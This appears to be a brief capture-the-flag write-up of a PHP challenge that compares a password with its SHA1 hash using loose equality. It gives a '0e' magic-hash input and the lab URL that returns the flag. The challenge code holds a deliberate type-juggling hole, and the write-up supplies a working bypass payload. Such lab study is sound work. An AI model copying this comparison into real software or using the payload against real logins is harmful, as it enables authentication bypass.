<?php
require("flag.php");
if(sha1($_GET["pass"])==$_GET["pass"])
{
echo $flag;
}
else
{
echo "Sorry!";
}
highlight_file(__FILE__);
?>
So it asks for a pass
as GET parameter and we have to supply an argument such that it’s SHA1 is equal to itself and it’s doing Loose comparison.
So if we put our input like 0e00000000000000000000081614617300000000
SHA1('0e00000000000000000000081614617300000000'
) equals to 0e65307525940999632287492285468259219070
So what PHP does is converts the input to a number because of e
and the comparison becomes 0 == 0
which is true. So we get the flag.
https://ctzlab.com/winja/?pass=0e00000000000000000000081614617300000000
PHP is a weird language.
References: